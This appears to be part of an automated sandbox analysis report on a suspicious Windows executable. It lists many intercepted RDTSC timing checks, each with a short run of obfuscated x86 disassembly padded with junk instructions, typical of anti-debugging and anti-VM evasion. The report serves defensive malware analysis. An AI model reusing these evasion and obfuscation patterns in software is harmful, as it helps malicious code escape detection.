Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 99613F second address: 996143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 996279 second address: 99627F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 99627F second address: 99629E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F9899183FF6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 99629E second address: 9962B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jc 00007F98991A2758h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pushad 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9962B0 second address: 9962DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jp 00007F9899183FE6h 0x00000010 jmp 00007F9899183FF9h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9962DE second address: 9962E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9962E4 second address: 9962E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9962E8 second address: 9962F2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F98991A2756h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 996439 second address: 996451 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9899183FECh 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F9899183FE6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9965BA second address: 9965C0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9965C0 second address: 9965CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9980F8 second address: 9980FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9980FC second address: 998160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F9899183FE8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 clc 0x00000023 jmp 00007F9899183FF3h 0x00000028 push 00000000h 0x0000002a mov ecx, dword ptr [ebp+122D379Eh] 0x00000030 call 00007F9899183FE9h 0x00000035 jns 00007F9899183FEEh 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jnp 00007F9899183FE8h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 998160 second address: 998192 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F98991A2764h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F98991A275Fh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 998192 second address: 998197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 998197 second address: 99819D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 99819D second address: 9981A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9981A1 second address: 998259 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jne 00007F98991A2768h 0x00000012 pop eax 0x00000013 add dword ptr [ebp+122D2B93h], esi 0x00000019 push 00000003h 0x0000001b mov edx, dword ptr [ebp+122D36A2h] 0x00000021 push 00000000h 0x00000023 mov edi, dword ptr [ebp+122D35C6h] 0x00000029 push 00000003h 0x0000002b call 00007F98991A275Ch 0x00000030 jc 00007F98991A2756h 0x00000036 pop ecx 0x00000037 push 7F7B4EEEh 0x0000003c push eax 0x0000003d push esi 0x0000003e jmp 00007F98991A2766h 0x00000043 pop esi 0x00000044 pop eax 0x00000045 add dword ptr [esp], 4084B112h 0x0000004c or dword ptr [ebp+122D2B00h], esi 0x00000052 lea ebx, dword ptr [ebp+1244EFD1h] 0x00000058 call 00007F98991A2766h 0x0000005d jns 00007F98991A275Ch 0x00000063 pop edi 0x00000064 xchg eax, ebx 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F98991A2760h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 998259 second address: 99825F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 99825F second address: 998276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F98991A275Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9982CE second address: 9982F5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9899183FE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push edx 0x00000010 pop edi 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+122D3332h], eax 0x00000019 call 00007F9899183FE9h 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9982F5 second address: 998306 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F98991A2756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 998306 second address: 99832C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F9899183FF3h 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 99832C second address: 9983B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F98991A275Bh 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f push ebx 0x00000010 push ebx 0x00000011 jmp 00007F98991A2766h 0x00000016 pop ebx 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007F98991A2762h 0x00000021 pop eax 0x00000022 jne 00007F98991A275Ah 0x00000028 push 00000003h 0x0000002a push ecx 0x0000002b jno 00007F98991A2756h 0x00000031 pop edi 0x00000032 push 00000000h 0x00000034 jmp 00007F98991A2765h 0x00000039 mov ecx, 093BDF62h 0x0000003e push 00000003h 0x00000040 mov esi, dword ptr [ebp+122D3312h] 0x00000046 push CC74C29Dh 0x0000004b push edx 0x0000004c pushad 0x0000004d pushad 0x0000004e popad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9983B5 second address: 9983F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 0C74C29Dh 0x0000000d push esi 0x0000000e pushad 0x0000000f xor dword ptr [ebp+122D1B18h], esi 0x00000015 mov ecx, eax 0x00000017 popad 0x00000018 pop edx 0x00000019 lea ebx, dword ptr [ebp+1244EFDAh] 0x0000001f mov dword ptr [ebp+122D3424h], esi 0x00000025 xchg eax, ebx 0x00000026 pushad 0x00000027 push eax 0x00000028 jmp 00007F9899183FF4h 0x0000002d pop eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push esi 0x00000031 pop esi 0x00000032 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9983F6 second address: 99840E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A275Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 99840E second address: 998412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9984A7 second address: 9984F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F98991A2758h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 jmp 00007F98991A2764h 0x00000027 push 00000000h 0x00000029 mov edx, 1C1D7A75h 0x0000002e push 05537D1Fh 0x00000033 push eax 0x00000034 push edx 0x00000035 push edi 0x00000036 push ebx 0x00000037 pop ebx 0x00000038 pop edi 0x00000039 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B9878 second address: 9B987C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B987C second address: 9B9882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B9882 second address: 9B9896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F9899183FE6h 0x0000000a jmp 00007F9899183FEAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 986B7E second address: 986B84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 986B84 second address: 986B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 986B8A second address: 986BC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2762h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jmp 00007F98991A2769h 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B7D3A second address: 9B7D5D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jmp 00007F9899183FF2h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jp 00007F9899183FECh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B7D5D second address: 9B7D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B7D67 second address: 9B7D71 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9899183FE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B7FE9 second address: 9B8003 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jl 00007F98991A2756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F98991A2756h 0x00000014 jnl 00007F98991A2756h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B8003 second address: 9B8007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B81C0 second address: 9B81E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2762h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F98991A2762h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B81E0 second address: 9B81E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B81E6 second address: 9B81EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B84D3 second address: 9B84D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B84D7 second address: 9B84E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B8643 second address: 9B8663 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9899183FFBh 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B8663 second address: 9B867F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F98991A275Fh 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B894B second address: 9B8972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9899183FE6h 0x0000000a jmp 00007F9899183FF0h 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 jo 00007F9899183FEEh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9ACBD0 second address: 9ACBD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9ACBD7 second address: 9ACBDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B949B second address: 9B949F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B9735 second address: 9B973B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B973B second address: 9B9741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9B9741 second address: 9B974D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BAEDE second address: 9BAEE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BAEE4 second address: 9BAEE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BE30D second address: 9BE33B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2767h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c jbe 00007F98991A2758h 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007F98991A2756h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BE33B second address: 9BE354 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9899183FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F9899183FE6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BE354 second address: 9BE35E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F98991A2756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BE35E second address: 9BE36C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BCA5B second address: 9BCA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BCA5F second address: 9BCA69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BE453 second address: 9BE45D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F98991A2756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BE45D second address: 9BE461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BE461 second address: 9BE490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007F98991A2768h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 jng 00007F98991A2756h 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9BE490 second address: 9BE4AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9899183FF5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C012A second address: 9C0136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F98991A2756h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C5DD8 second address: 9C5DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C5DDC second address: 9C5DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F98991A2766h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C60C9 second address: 9C60DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C60DF second address: 9C60E9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F98991A275Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C849C second address: 9C84A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C84A0 second address: 9C84A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C84A6 second address: 9C853C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9899183FECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 113B6894h 0x00000011 mov esi, dword ptr [ebp+122D31EAh] 0x00000017 call 00007F9899183FE9h 0x0000001c jo 00007F9899183FEEh 0x00000022 push ecx 0x00000023 jng 00007F9899183FE6h 0x00000029 pop ecx 0x0000002a push eax 0x0000002b jc 00007F9899183FFFh 0x00000031 jmp 00007F9899183FF9h 0x00000036 mov eax, dword ptr [esp+04h] 0x0000003a push eax 0x0000003b jmp 00007F9899183FF3h 0x00000040 pop eax 0x00000041 mov eax, dword ptr [eax] 0x00000043 jmp 00007F9899183FF9h 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jo 00007F9899183FE6h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C853C second address: 9C8542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C88A6 second address: 9C88AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C9006 second address: 9C9052 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jng 00007F98991A2756h 0x00000011 jmp 00007F98991A2762h 0x00000016 popad 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b popad 0x0000001c xchg eax, ebx 0x0000001d mov esi, dword ptr [ebp+122D3846h] 0x00000023 nop 0x00000024 jnp 00007F98991A2764h 0x0000002a push eax 0x0000002b push eax 0x0000002c pushad 0x0000002d push edx 0x0000002e pop edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C9494 second address: 9C94BA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F9899183FFDh 0x0000000f jmp 00007F9899183FF7h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C962F second address: 9C9643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 cld 0x0000000a xchg eax, ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F98991A2756h 0x00000014 rdtsc
